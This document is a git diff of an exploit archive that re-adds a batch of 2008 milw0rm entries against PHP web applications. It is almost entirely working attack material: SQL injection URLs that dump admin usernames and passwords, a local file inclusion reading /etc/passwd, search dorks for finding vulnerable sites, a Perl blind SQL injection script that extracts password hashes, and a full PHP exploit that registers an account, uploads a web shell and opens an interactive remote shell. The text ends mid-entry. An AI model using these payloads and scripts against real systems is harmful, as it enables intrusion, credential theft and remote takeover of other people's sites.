+ `+---------------------------^----------| + `\_,-------, _________________________| + / XXXXXX /`| / + / XXXXXX / `\ / + / XXXXXX /\______( + / XXXXXX / + / XXXXXX / + (________( + `------' + + +AUTHOR : CWH Underground +DATE : 25 June 2008 +SITE : www.citec.us + + +##################################################### + APPLICATION : Webdevindo-CMS + VERSION : 1.0.0 + VENDOR : N/A + DOWNLOAD : http://downloads.sourceforge.net/webdevindo-cms +##################################################### + +--- Remote SQL Injection --- + +--------- + Exploit +--------- + +[+] http://[Target]/[webdevindo_path]/index.php?hal=[SQL Injection] + +------------- + POC Exploit +------------- + +[+] http://192.168.24.25/webdevindo/index.php?hal=-99999'/**/union/**/select/**/Password/**/from/**/jos_user/**/where/**/LoginName='admin + + +################################################################## +# Greetz: ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos # +################################################################## + +# milw0rm.com [2008-06-25] diff --git a/platforms/php/webapps/5933.txt b/platforms/php/webapps/5933.txt index 747e8b445..a7722cbde 100755 --- a/platforms/php/webapps/5933.txt +++ b/platforms/php/webapps/5933.txt 
@@ -1,15 +1,15 @@ -@~~===========================================~~@ -| Author => StAkeR ~ StAkeR@hotmail.it | -@~~===========================================~~@ -+ + -@~~===========================================~~@ -| mUnky 0.0.1 <= Local File Inclusion Vuln | -@~~===========================================~~@ -| index.php?zone=../../../../../etc/passwd%00 | -@~~===========================================~~@ -+ -@~~=========================================================================~~@ -| http://dfn.dl.sourceforge.net/sourceforge/munky/munky-bliki-0.01a.tar.gz | -@~~=========================================================================~~@ - -# milw0rm.com [2008-06-25] +@~~===========================================~~@ +| Author => StAkeR ~ StAkeR@hotmail.it | +@~~===========================================~~@ ++ + +@~~===========================================~~@ +| mUnky 0.0.1 <= Local File Inclusion Vuln | +@~~===========================================~~@ +| index.php?zone=../../../../../etc/passwd%00 | +@~~===========================================~~@ ++ +@~~=========================================================================~~@ +| http://dfn.dl.sourceforge.net/sourceforge/munky/munky-bliki-0.01a.tar.gz | +@~~=========================================================================~~@ + +# milw0rm.com [2008-06-25] diff --git a/platforms/php/webapps/5934.txt b/platforms/php/webapps/5934.txt index bf4cb12dc..40a595111 100755 --- a/platforms/php/webapps/5934.txt +++ b/platforms/php/webapps/5934.txt 
@@ -1,45 +1,45 @@ -######################################################### -# -# Jokes & Funny Pics Script SQL Injection Vulnerability -#======================================================== -# -# Author: Hussin X -# -# Home : www.tryag.cc/cc -# -# email: darkangel_g85[at]Yahoo[DoT]com -# hussin.x[at]hotmail[DoT]com -# -#======================================================== -# HomE script : http://www.softbizscripts.com -# -# Demo : http://www.softbizscripts.com/scripts/jokes -# -# DorK : "index.php?sbjoke_id=" - -########################################################## - -Exploit: - - -http://www.site.org/Script/index.php?sbjoke_id=-1+union+select+0,1,2,3,concat_ws(sbadmin_pwd,0x3a,sbadmin_name),5,6,7,8,9,10+from+sbjks_admin-- - - -Exploit: 2 - -index.php?sbjoke_id=-1+union+select+0,1,2,3,concat_ws(sbadmin_pwd,0x3a,sbadmin_name),5,6,7,8,9,10,11,12,13+from+sbjks_admin-- - -Login : - -/admin/ - - -################################################################################ -####################################( Greetz )################################## -# # -# tryag / Mr.IraQ / DeViL iRaQ / IRAQ DiveR/ IRAQ_JAGUAR /str0ke # -# Silic0n / Rafi / FAHD / Iraqihack # -# # -#################################(and All IRAQIs)############################### - -# milw0rm.com [2008-06-25] +######################################################### +# +# Jokes & Funny Pics Script SQL Injection Vulnerability +#======================================================== +# +# Author: Hussin X +# +# Home : www.tryag.cc/cc +# +# email: darkangel_g85[at]Yahoo[DoT]com +# hussin.x[at]hotmail[DoT]com +# +#======================================================== +# HomE script : http://www.softbizscripts.com +# +# Demo : http://www.softbizscripts.com/scripts/jokes +# +# DorK : "index.php?sbjoke_id=" + +########################################################## + +Exploit: + + 
+http://www.site.org/Script/index.php?sbjoke_id=-1+union+select+0,1,2,3,concat_ws(sbadmin_pwd,0x3a,sbadmin_name),5,6,7,8,9,10+from+sbjks_admin-- + + +Exploit: 2 + +index.php?sbjoke_id=-1+union+select+0,1,2,3,concat_ws(sbadmin_pwd,0x3a,sbadmin_name),5,6,7,8,9,10,11,12,13+from+sbjks_admin-- + +Login : + +/admin/ + + +################################################################################ +####################################( Greetz )################################## +# # +# tryag / Mr.IraQ / DeViL iRaQ / IRAQ DiveR/ IRAQ_JAGUAR /str0ke # +# Silic0n / Rafi / FAHD / Iraqihack # +# # +#################################(and All IRAQIs)############################### + +# milw0rm.com [2008-06-25] diff --git a/platforms/php/webapps/5935.pl b/platforms/php/webapps/5935.pl index db461d788..81884e0a2 100755 --- a/platforms/php/webapps/5935.pl +++ b/platforms/php/webapps/5935.pl 
@@ -1,106 +1,106 @@ -#!/usr/bin/perl -use LWP::UserAgent; -use Getopt::Long; - -if(!$ARGV[1]) -{ - print " \n"; - print " #######################################################################\n"; - print " # Mambo Component Articles Blind SQL Injection Exploit #\n"; - print " # Author:Ded MustD!e [www.antichat.ru] #\n"; - print " # #\n"; - print " # Dork : inurl:option=articles artid #\n"; - print " # Usage: perl exploit.pl host path #\n"; - print " # Example: perl exploit.pl www.host.com /joomla/ -a 2 #\n"; - print " # #\n"; - print " # Options: #\n"; - print " # -a valid Article id #\n"; - print " #######################################################################\n"; - exit; -} - -my $host = $ARGV[0]; -my $path = $ARGV[1]; -my $userid = 1; -my $aid = $ARGV[2]; - -my %options = (); -GetOptions(\%options, "u=i", "p=s", "a=i"); - -print "[~] Exploiting...\n"; - -if($options{"u"}) -{ - $userid = $options{"u"}; -} - -if($options{"a"}) -{ - $aid = $options{"a"}; -} - -syswrite(STDOUT, "[~] MD5-Hash: ", 14); - -for(my $i = 1; $i <= 32; $i++) -{ - my $f = 0; - my $h = 48; - while(!$f && $h <= 57) - { - if(istrue2($host, $path, $userid, $aid, $i, $h)) - { - $f = 1; - syswrite(STDOUT, chr($h), 1); - } - $h++; - } - if(!$f) - { - $h = 97; - while(!$f && $h <= 122) - { - if(istrue2($host, $path, $userid, $aid, $i, $h)) - { - $f = 1; - syswrite(STDOUT, chr($h), 1); - } - $h++; - } - } -} - -print "\n[~] Exploiting done\n"; - -sub istrue2 -{ - my $host = shift; - my $path = shift; - my $uid = shift; - my $aid = shift; - my $i = shift; - my $h = shift; - - my $ua = LWP::UserAgent->new; - my $query = "http://".$host.$path."index.php?option=articles&task=viewarticle&artid=".$aid." 
and ascii(SUBSTRING((SELECT password FROM mos_users LIMIT 0,1),".$i.",1))=".$h.""; - - if($options{"p"}) - { - $ua->proxy('http', "http://".$options{"p"}); - } - - my $resp = $ua->get($query); - my $content = $resp->content; - my $regexp = "Back"; - - if($content =~ /$regexp/) - { - return 1; - } - else - { - return 0; - } - -} - -# milw0rm.com [2008-06-25] +#!/usr/bin/perl +use LWP::UserAgent; +use Getopt::Long; + +if(!$ARGV[1]) +{ + print " \n"; + print " #######################################################################\n"; + print " # Mambo Component Articles Blind SQL Injection Exploit #\n"; + print " # Author:Ded MustD!e [www.antichat.ru] #\n"; + print " # #\n"; + print " # Dork : inurl:option=articles artid #\n"; + print " # Usage: perl exploit.pl host path #\n"; + print " # Example: perl exploit.pl www.host.com /joomla/ -a 2 #\n"; + print " # #\n"; + print " # Options: #\n"; + print " # -a valid Article id #\n"; + print " #######################################################################\n"; + exit; +} + +my $host = $ARGV[0]; +my $path = $ARGV[1]; +my $userid = 1; +my $aid = $ARGV[2]; + +my %options = (); +GetOptions(\%options, "u=i", "p=s", "a=i"); + +print "[~] Exploiting...\n"; + +if($options{"u"}) +{ + $userid = $options{"u"}; +} + +if($options{"a"}) +{ + $aid = $options{"a"}; +} + +syswrite(STDOUT, "[~] MD5-Hash: ", 14); + +for(my $i = 1; $i <= 32; $i++) +{ + my $f = 0; + my $h = 48; + while(!$f && $h <= 57) + { + if(istrue2($host, $path, $userid, $aid, $i, $h)) + { + $f = 1; + syswrite(STDOUT, chr($h), 1); + } + $h++; + } + if(!$f) + { + $h = 97; + while(!$f && $h <= 122) + { + if(istrue2($host, $path, $userid, $aid, $i, $h)) + { + $f = 1; + syswrite(STDOUT, chr($h), 1); + } + $h++; + } + } +} + +print "\n[~] Exploiting done\n"; + +sub istrue2 +{ + my $host = shift; + my $path = shift; + my $uid = shift; + my $aid = shift; + my $i = shift; + my $h = shift; + + my $ua = LWP::UserAgent->new; + my $query = 
"http://".$host.$path."index.php?option=articles&task=viewarticle&artid=".$aid." and ascii(SUBSTRING((SELECT password FROM mos_users LIMIT 0,1),".$i.",1))=".$h.""; + + if($options{"p"}) + { + $ua->proxy('http', "http://".$options{"p"}); + } + + my $resp = $ua->get($query); + my $content = $resp->content; + my $regexp = "Back"; + + if($content =~ /$regexp/) + { + return 1; + } + else + { + return 0; + } + +} + +# milw0rm.com [2008-06-25] diff --git a/platforms/php/webapps/5936.txt b/platforms/php/webapps/5936.txt index 7eaf56dea..f2b9fcc21 100755 --- a/platforms/php/webapps/5936.txt +++ b/platforms/php/webapps/5936.txt 
@@ -1,45 +1,45 @@ -================================================================ - Page Manager CMS Remote Arbitrary File Upload Vulnerability -================================================================ - - ,--^----------,--------,-----,-------^--, - | ||||||||| `--------' | O .. CWH Underground Hacking Team .. - `+---------------------------^----------| - `\_,-------, _________________________| - / XXXXXX /`| / - / XXXXXX / `\ / - / XXXXXX /\______( - / XXXXXX / - / XXXXXX / - (________( - `------' - - -AUTHOR : CWH Underground -DATE : 25 June 2008 -SITE : www.citec.us - - -##################################################### - APPLICATION : Page Manager - VERSION : 2006-02-04 - VENDOR : N/A - DOWNLOAD : http://downloads.sourceforge.net/pagemanager -##################################################### - ----Arbitrary File Upload Exploit--- - - This Vulnerability can upload malicious files direct to web server. - -[Anonymous Can arbitrary upload] - -[+] Upload Path: http://[Target]/[pagemanager_path]/upload.php - -[+] Shell Script: http://[Target]/[Evil File] - - -################################################################## -# Greetz: ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos # -################################################################## - -# milw0rm.com [2008-06-25] +================================================================ + Page Manager CMS Remote Arbitrary File Upload Vulnerability +================================================================ + + ,--^----------,--------,-----,-------^--, + | ||||||||| `--------' | O .. CWH Underground Hacking Team .. 
+ `+---------------------------^----------| + `\_,-------, _________________________| + / XXXXXX /`| / + / XXXXXX / `\ / + / XXXXXX /\______( + / XXXXXX / + / XXXXXX / + (________( + `------' + + +AUTHOR : CWH Underground +DATE : 25 June 2008 +SITE : www.citec.us + + +##################################################### + APPLICATION : Page Manager + VERSION : 2006-02-04 + VENDOR : N/A + DOWNLOAD : http://downloads.sourceforge.net/pagemanager +##################################################### + +---Arbitrary File Upload Exploit--- + + This Vulnerability can upload malicious files direct to web server. + +[Anonymous Can arbitrary upload] + +[+] Upload Path: http://[Target]/[pagemanager_path]/upload.php + +[+] Shell Script: http://[Target]/[Evil File] + + +################################################################## +# Greetz: ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos # +################################################################## + +# milw0rm.com [2008-06-25] diff --git a/platforms/php/webapps/5937.txt b/platforms/php/webapps/5937.txt index 31c039afd..e8840f0c1 100755 --- a/platforms/php/webapps/5937.txt +++ b/platforms/php/webapps/5937.txt 
@@ -1,64 +1,64 @@ -=============================================================== - MyPHP CMS (page.php pid) Remote SQL Injection Vulnerability -=============================================================== - - ,--^----------,--------,-----,-------^--, - | ||||||||| `--------' | O .. CWH Underground Hacking Team .. - `+---------------------------^----------| - `\_,-------, _________________________| - / XXXXXX /`| / - / XXXXXX / `\ / - / XXXXXX /\______( - / XXXXXX / - / XXXXXX / - (________( - `------' - - -AUTHOR : CWH Underground -DATE : 25 June 2008 -SITE : www.citec.us - - -##################################################### - APPLICATION : MyPHP CMS - VERSION : 0.3.1 - VENDOR : N/A - DOWNLOAD : http://downloads.sourceforge.net/myphpcms -##################################################### - ---- Remote SQL Injection --- - -** Magic Quote must turn off ** - ---------------------------------- - Vulnerable File [page.php?pid=] ---------------------------------- - -@Line - - 13: $psql = "SELECT * FROM ".$table_prefix."pages WHERE pid='$pid'"; - 14: $pprocess = mysql_query ( $psql ); - 15: $prow = mysql_fetch_array ( $pprocess ); - ---------- - Exploit ---------- - -[+] http://[Target]/[myphpcms_path]/pages.php?pid=-9999'/**/UNION/**/SELECT/**/1,username,3,password,5,6/**/FROM/**/[prefix_users]/**/WHERE/**/uid='1 - - This exploit can dump username and password in clear text - -------------- - POC Exploit -------------- - -[+] http://192.168.24.25/myphpcms/pages.php?pid=-9999'/**/UNION/**/SELECT/**/1,username,3,password,5,6/**/FROM/**/users/**/WHERE/**/uid='1 - - - -################################################################## -# Greetz: ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos # -################################################################## - -# milw0rm.com [2008-06-25] +=============================================================== + MyPHP CMS (page.php pid) Remote SQL Injection Vulnerability 
+=============================================================== + + ,--^----------,--------,-----,-------^--, + | ||||||||| `--------' | O .. CWH Underground Hacking Team .. + `+---------------------------^----------| + `\_,-------, _________________________| + / XXXXXX /`| / + / XXXXXX / `\ / + / XXXXXX /\______( + / XXXXXX / + / XXXXXX / + (________( + `------' + + +AUTHOR : CWH Underground +DATE : 25 June 2008 +SITE : www.citec.us + + +##################################################### + APPLICATION : MyPHP CMS + VERSION : 0.3.1 + VENDOR : N/A + DOWNLOAD : http://downloads.sourceforge.net/myphpcms +##################################################### + +--- Remote SQL Injection --- + +** Magic Quote must turn off ** + +--------------------------------- + Vulnerable File [page.php?pid=] +--------------------------------- + +@Line + + 13: $psql = "SELECT * FROM ".$table_prefix."pages WHERE pid='$pid'"; + 14: $pprocess = mysql_query ( $psql ); + 15: $prow = mysql_fetch_array ( $pprocess ); + +--------- + Exploit +--------- + +[+] http://[Target]/[myphpcms_path]/pages.php?pid=-9999'/**/UNION/**/SELECT/**/1,username,3,password,5,6/**/FROM/**/[prefix_users]/**/WHERE/**/uid='1 + + This exploit can dump username and password in clear text + +------------- + POC Exploit +------------- + +[+] http://192.168.24.25/myphpcms/pages.php?pid=-9999'/**/UNION/**/SELECT/**/1,username,3,password,5,6/**/FROM/**/users/**/WHERE/**/uid='1 + + + +################################################################## +# Greetz: ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos # +################################################################## + +# milw0rm.com [2008-06-25] diff --git a/platforms/php/webapps/5938.php b/platforms/php/webapps/5938.php index f16ae3c21..c9a7687c0 100755 --- a/platforms/php/webapps/5938.php +++ b/platforms/php/webapps/5938.php 
@@ -1,234 +1,234 @@ -= $limit_size) { - 269. // Display file size error - 270. // /////////////////////// - 271. $show = 1; - 272. $message_type = $config["notification_success"];//the messsage displayed at the top coner - 273. $error_message = 'Your image is too large. The maximum size allowed is: ' . $config['maximum_size_human_readale']; - 274. $blk_id = 1;//html table - error block - 275. $template = "templates/main_1.htm"; - 276. $inner_template1 = "templates/inner_myaccount_update_profile.htm";//middle of page - 277. $TBS = new clsTinyButStrong; - 278. $TBS->NoErr = true;// no more error message displayed. - 279. $TBS->LoadTemplate("$template"); - 280. $TBS->Render = TBS_OUTPUT; - 281. $TBS->Show(); - 282. - 283. @mysql_close(); - 284. die(); - 285. } - 286. else { - 287. $filetype = $_FILES['ufile']['type']; <======= - 288. if ($filetype == "image/gif" || $filetype == "image/jpeg" || $filetype == - 289. "image/pjpeg") { - 290. // copy file to where you want to store file - 291. if (@copy($_FILES['ufile']['tmp_name'], $path)) { - 292. } - 293. else { - 294. // Display general file copy error - - an attacker might be able to upload arbitrary malicious files with .php extension due to the code - near lines 287-289 will check only the MIME type of the upload request, that can be easily spoofed! -*/ - -error_reporting(0); -set_time_limit(0); -ini_set("default_socket_timeout", 5); - -function http_send($host, $packet) -{ - $sock = fsockopen($host, 80); - while (!$sock) - { - print "\n[-] No response from {$host}:80 Trying again..."; - $sock = fsockopen($host, 80); - } - fputs($sock, $packet); - while (!feof($sock)) $resp .= fread($sock, 1024); - fclose($sock); - return $resp; -} - -// yes, SQL injection vulnerable too! 
-function retrive_data($field, $table, $clause) -{ - global $host, $path; - - $sql = "-1/**/UNION/**/SELECT/**/".str_repeat("1,",16)."{$field},".encodeSQL("yes").",1,1,1/**/FROM/**/{$table}/**/WHERE/**/{$clause}%23"; - - $packet = "GET {$path}play.php?vid={$sql} HTTP/1.0\r\n"; - $packet .= "Host: {$host}\r\n"; - $packet .= "Connection: close\r\n\r\n"; - - preg_match("/play.php\?vid=(.*)\"/", http_send($host, $packet), $match); - return $match[1]; -} - -function encodeSQL($sql) -{ - for ($i = 0, $n = strlen($sql); $i < $n; $i++) $encoded .= dechex(ord($sql[$i])); - return "CONCAT(0x{$encoded})"; -} - -function upload() -{ - global $host, $path, $sid, $username; - - login(); - - print "[-] Trying to upload a shell...\n"; - - $payload = "--o0oOo0o\r\n"; - $payload .= "Content-Disposition: form-data; name=\"submitted_pic\"\r\n\r\nyes\r\n"; - $payload .= "--o0oOo0o\r\n"; - $payload .= "Content-Disposition: form-data; name=\"ufile\"; filename=\".php\"\r\n"; - $payload .= "Content-Type: image/jpeg\r\n\r\n"; - $payload .= "\r\n"; - $payload .= "--o0oOo0o--\r\n"; - - $packet = "POST {$path}update_profile.php HTTP/1.0\r\n"; - $packet .= "Host: {$host}\r\n"; - $packet .= "Cookie: PHPSESSID={$sid}\r\n"; - $packet .= "Content-Length: ".strlen($payload)."\r\n"; - $packet .= "Content-Type: multipart/form-data; boundary=o0oOo0o\r\n"; - $packet .= "Connection: close\r\n\r\n"; - $packet .= $payload; - - http_send($host, $packet); - - $user_id = (int) retrive_data("user_id", "member_profile", "user_name=".encodeSQL($username)); - $file_name = retrive_data("file_name", "pictures", "user_id={$user_id}"); - - if (!isset($file_name)) die("\n[-] Upload failed...\n"); - else return $file_name; -} - -function login() -{ - global $host, $path, $username, $password, $sid; - - print "\n[-] Logging in with username '{$username}' and password '{$password}'\n"; - - $data = "user_name_login={$username}&password_login={$password}&submitted=yes"; - $packet = "POST {$path}login.php HTTP/1.0\r\n"; - 
$packet.= "Host: {$host}\r\n"; - $packet.= "Content-Length: ".strlen($data)."\r\n"; - $packet.= "Content-Type: application/x-www-form-urlencoded\r\n"; - $packet.= "Connection: close\r\n\r\n"; - $packet.= $data; - $html = http_send($host, $packet); - - preg_match("/PHPSESSID=([0-9a-f]{32})/i", $html, $match); - $sid = $match[1]; - - if (!preg_match("/Location: myaccount.php/i", $html)) - { - print "[-] Login failed!\n"; - register(); - login(); - } -} - -function register() -{ - global $host, $path, $username, $password; - - print "\n[-] Registering new user '{$username}' with password '{$password}'\n"; - - // register a new account - $data = "user_name={$username}"; - $data .= "&password={$password}"; - $data .= "&confirm_password={$password}"; - $data .= "&email_address=".md5(time())."@null.com"; - $data .= "&form_submitted=yes"; - $data .= "&terms=yes"; - $packet = "POST {$path}register.php HTTP/1.0\r\n"; - $packet.= "Host: {$host}\r\n"; - $packet.= "Content-Length: ".strlen($data)."\r\n"; - $packet.= "Content-Type: application/x-www-form-urlencoded\r\n"; - $packet.= "Connection: close\r\n\r\n"; - $packet.= $data; - - http_send($host, $packet); - - $code = retrive_data("random_code", "member_profile", "user_name=".encodeSQL($username)); - if (!isset($code)) die("\n[-] Registration failed...\n"); - - // and confirm the registration - $packet = "GET {$path}confirm.php?id={$code} HTTP/1.0\r\n"; - $packet.= "Host: {$host}\r\n"; - $packet.= "Connection: close\r\n\r\n"; - - if (!preg_match("/registration is now complete/i", http_send($host, $packet))) die("\n[-] Registration failed...\n"); -} - -print "\n+---------------------------------------------------------------------------+"; -print "\n| PHPmotion <= 2.0 (update_profile.php) Remote Shell Upload Exploit by EgiX |"; -print "\n+---------------------------------------------------------------------------+\n"; - -if ($argc < 3) -{ - print "\nUsage......: php $argv[0] host path\n"; - print "\nExample....: php $argv[0] 
localhost /"; - print "\nExample....: php $argv[0] localhost /phpmotion/\n"; - die(); -} - -$host = $argv[1]; -$path = $argv[2]; - -$username = "pr00f_0f"; -$password = "_c0nc3pt"; - -$r_path = "pictures/".upload(); - -define(STDIN, fopen("php://stdin", "r")); - -while(1) -{ - print "\nphpmotion-shell# "; - $cmd = trim(fgets(STDIN)); - if ($cmd != "exit") - { - $packet = "GET {$path}{$r_path} HTTP/1.0\r\n"; - $packet.= "Host: {$host}\r\n"; - $packet.= "Cmd: ".base64_encode($cmd)."\r\n"; - $packet.= "Connection: close\r\n\r\n"; - $output = http_send($host, $packet); - if (!preg_match("/_code_/", $output)) die("\n[-] Exploit failed...\n"); - $shell = explode("_code_", $output); - print "\n{$shell[1]}"; - } - else break; -} - -?> - -# milw0rm.com [2008-06-25] += $limit_size) { + 269. // Display file size error + 270. // /////////////////////// + 271. $show = 1; + 272. $message_type = $config["notification_success"];//the messsage displayed at the top coner + 273. $error_message = 'Your image is too large. The maximum size allowed is: ' . $config['maximum_size_human_readale']; + 274. $blk_id = 1;//html table - error block + 275. $template = "templates/main_1.htm"; + 276. $inner_template1 = "templates/inner_myaccount_update_profile.htm";//middle of page + 277. $TBS = new clsTinyButStrong; + 278. $TBS->NoErr = true;// no more error message displayed. + 279. $TBS->LoadTemplate("$template"); + 280. $TBS->Render = TBS_OUTPUT; + 281. $TBS->Show(); + 282. + 283. @mysql_close(); + 284. die(); + 285. } + 286. else { + 287. $filetype = $_FILES['ufile']['type']; <======= + 288. if ($filetype == "image/gif" || $filetype == "image/jpeg" || $filetype == + 289. "image/pjpeg") { + 290. // copy file to where you want to store file + 291. if (@copy($_FILES['ufile']['tmp_name'], $path)) { + 292. } + 293. else { + 294. 
// Display general file copy error + + an attacker might be able to upload arbitrary malicious files with .php extension due to the code + near lines 287-289 will check only the MIME type of the upload request, that can be easily spoofed! +*/ + +error_reporting(0); +set_time_limit(0); +ini_set("default_socket_timeout", 5); + +function http_send($host, $packet) +{ + $sock = fsockopen($host, 80); + while (!$sock) + { + print "\n[-] No response from {$host}:80 Trying again..."; + $sock = fsockopen($host, 80); + } + fputs($sock, $packet); + while (!feof($sock)) $resp .= fread($sock, 1024); + fclose($sock); + return $resp; +} + +// yes, SQL injection vulnerable too! +function retrive_data($field, $table, $clause) +{ + global $host, $path; + + $sql = "-1/**/UNION/**/SELECT/**/".str_repeat("1,",16)."{$field},".encodeSQL("yes").",1,1,1/**/FROM/**/{$table}/**/WHERE/**/{$clause}%23"; + + $packet = "GET {$path}play.php?vid={$sql} HTTP/1.0\r\n"; + $packet .= "Host: {$host}\r\n"; + $packet .= "Connection: close\r\n\r\n"; + + preg_match("/play.php\?vid=(.*)\"/", http_send($host, $packet), $match); + return $match[1]; +} + +function encodeSQL($sql) +{ + for ($i = 0, $n = strlen($sql); $i < $n; $i++) $encoded .= dechex(ord($sql[$i])); + return "CONCAT(0x{$encoded})"; +} + +function upload() +{ + global $host, $path, $sid, $username; + + login(); + + print "[-] Trying to upload a shell...\n"; + + $payload = "--o0oOo0o\r\n"; + $payload .= "Content-Disposition: form-data; name=\"submitted_pic\"\r\n\r\nyes\r\n"; + $payload .= "--o0oOo0o\r\n"; + $payload .= "Content-Disposition: form-data; name=\"ufile\"; filename=\".php\"\r\n"; + $payload .= "Content-Type: image/jpeg\r\n\r\n"; + $payload .= "\r\n"; + $payload .= "--o0oOo0o--\r\n"; + + $packet = "POST {$path}update_profile.php HTTP/1.0\r\n"; + $packet .= "Host: {$host}\r\n"; + $packet .= "Cookie: PHPSESSID={$sid}\r\n"; + $packet .= "Content-Length: ".strlen($payload)."\r\n"; + $packet .= "Content-Type: multipart/form-data; 
boundary=o0oOo0o\r\n"; + $packet .= "Connection: close\r\n\r\n"; + $packet .= $payload; + + http_send($host, $packet); + + $user_id = (int) retrive_data("user_id", "member_profile", "user_name=".encodeSQL($username)); + $file_name = retrive_data("file_name", "pictures", "user_id={$user_id}"); + + if (!isset($file_name)) die("\n[-] Upload failed...\n"); + else return $file_name; +} + +function login() +{ + global $host, $path, $username, $password, $sid; + + print "\n[-] Logging in with username '{$username}' and password '{$password}'\n"; + + $data = "user_name_login={$username}&password_login={$password}&submitted=yes"; + $packet = "POST {$path}login.php HTTP/1.0\r\n"; + $packet.= "Host: {$host}\r\n"; + $packet.= "Content-Length: ".strlen($data)."\r\n"; + $packet.= "Content-Type: application/x-www-form-urlencoded\r\n"; + $packet.= "Connection: close\r\n\r\n"; + $packet.= $data; + $html = http_send($host, $packet); + + preg_match("/PHPSESSID=([0-9a-f]{32})/i", $html, $match); + $sid = $match[1]; + + if (!preg_match("/Location: myaccount.php/i", $html)) + { + print "[-] Login failed!\n"; + register(); + login(); + } +} + +function register() +{ + global $host, $path, $username, $password; + + print "\n[-] Registering new user '{$username}' with password '{$password}'\n"; + + // register a new account + $data = "user_name={$username}"; + $data .= "&password={$password}"; + $data .= "&confirm_password={$password}"; + $data .= "&email_address=".md5(time())."@null.com"; + $data .= "&form_submitted=yes"; + $data .= "&terms=yes"; + $packet = "POST {$path}register.php HTTP/1.0\r\n"; + $packet.= "Host: {$host}\r\n"; + $packet.= "Content-Length: ".strlen($data)."\r\n"; + $packet.= "Content-Type: application/x-www-form-urlencoded\r\n"; + $packet.= "Connection: close\r\n\r\n"; + $packet.= $data; + + http_send($host, $packet); + + $code = retrive_data("random_code", "member_profile", "user_name=".encodeSQL($username)); + if (!isset($code)) die("\n[-] Registration failed...\n"); 
+ + // and confirm the registration + $packet = "GET {$path}confirm.php?id={$code} HTTP/1.0\r\n"; + $packet.= "Host: {$host}\r\n"; + $packet.= "Connection: close\r\n\r\n"; + + if (!preg_match("/registration is now complete/i", http_send($host, $packet))) die("\n[-] Registration failed...\n"); +} + +print "\n+---------------------------------------------------------------------------+"; +print "\n| PHPmotion <= 2.0 (update_profile.php) Remote Shell Upload Exploit by EgiX |"; +print "\n+---------------------------------------------------------------------------+\n"; + +if ($argc < 3) +{ + print "\nUsage......: php $argv[0] host path\n"; + print "\nExample....: php $argv[0] localhost /"; + print "\nExample....: php $argv[0] localhost /phpmotion/\n"; + die(); +} + +$host = $argv[1]; +$path = $argv[2]; + +$username = "pr00f_0f"; +$password = "_c0nc3pt"; + +$r_path = "pictures/".upload(); + +define(STDIN, fopen("php://stdin", "r")); + +while(1) +{ + print "\nphpmotion-shell# "; + $cmd = trim(fgets(STDIN)); + if ($cmd != "exit") + { + $packet = "GET {$path}{$r_path} HTTP/1.0\r\n"; + $packet.= "Host: {$host}\r\n"; + $packet.= "Cmd: ".base64_encode($cmd)."\r\n"; + $packet.= "Connection: close\r\n\r\n"; + $output = http_send($host, $packet); + if (!preg_match("/_code_/", $output)) die("\n[-] Exploit failed...\n"); + $shell = explode("_code_", $output); + print "\n{$shell[1]}"; + } + else break; +} + +?> + +# milw0rm.com [2008-06-25] diff --git a/platforms/php/webapps/5939.txt b/platforms/php/webapps/5939.txt index ac93ac74f..5c9da023e 100755 --- a/platforms/php/webapps/5939.txt +++ b/platforms/php/webapps/5939.txt 
@@ -1,21 +1,21 @@ -/---------------------------------------------------------------\ -\ / -/ Joomla Component netinvoice Remote SQL injection \ -\ / -\---------------------------------------------------------------/ - - -[*] Author : His0k4 [ALGERIAN HaCkEr] - -[*] Dork : inurl:com_netinvoice - -[*] POC : http://localhost/[Joomla_Path]/index.php?option=com_netinvoice&action=orders&task=order&cid={SQL} - -[*] Example : http://localhost/[Joomla_Path]/index.php?option=com_netinvoice&action=orders&task=order&cid=-1 UNION SELECT 1,2,3,concat(username,0x3a,password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48 FROM jos_users-- - - ----------------------------------------------------------------------------- -[*] Greetings : All friends & muslims HaCkeRs... -[*] Greetings2: http://palcastle.org/cc - -# milw0rm.com [2008-06-25] +/---------------------------------------------------------------\ +\ / +/ Joomla Component netinvoice Remote SQL injection \ +\ / +\---------------------------------------------------------------/ + + +[*] Author : His0k4 [ALGERIAN HaCkEr] + +[*] Dork : inurl:com_netinvoice + +[*] POC : http://localhost/[Joomla_Path]/index.php?option=com_netinvoice&action=orders&task=order&cid={SQL} + +[*] Example : http://localhost/[Joomla_Path]/index.php?option=com_netinvoice&action=orders&task=order&cid=-1 UNION SELECT 1,2,3,concat(username,0x3a,password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48 FROM jos_users-- + + +---------------------------------------------------------------------------- +[*] Greetings : All friends & muslims HaCkeRs... +[*] Greetings2: http://palcastle.org/cc + +# milw0rm.com [2008-06-25] diff --git a/platforms/php/webapps/5940.txt b/platforms/php/webapps/5940.txt index d770c88f3..db6cbce8d 100755 --- a/platforms/php/webapps/5940.txt +++ b/platforms/php/webapps/5940.txt 
@@ -1,71 +1,71 @@ -=========================================================== - Keller Web Admin CMS Local File Inclusion Vulnerability -=========================================================== - - ,--^----------,--------,-----,-------^--, - | ||||||||| `--------' | O .. CWH Underground Hacking Team .. - `+---------------------------^----------| - `\_,-------, _________________________| - / XXXXXX /`| / - / XXXXXX / `\ / - / XXXXXX /\______( - / XXXXXX / - / XXXXXX / - (________( - `------' - - -AUTHOR : CWH Underground -DATE : 26 June 2008 -SITE : cwh.citec.us - - -##################################################### - APPLICATION : Keller Web Admin CMS - VERSION : 0.94 Pro - VENDOR : N/A - DOWNLOAD : http://downloads.sourceforge.net/kwa -##################################################### - ---- Local File Inclusion --- - -------------------------------------- - Vulnerable File [/Public/index.php] -------------------------------------- - -@Line - - 21: if (isset($_GET['action'])) { - 22: $action=$_GET['action']; - 23: $inclConfig = $includeFolder.$action.".inc.php"; - 24: include($inclConfig); - 25: header('Location: '.$clnt_referer); - 26: die(); - 27: } - ---------- - Exploit ---------- - -[+] http://[Target]/[kwa_path]/Public/index.php?action=[LFI] - -------------- - POC Exploit -------------- - -[+] 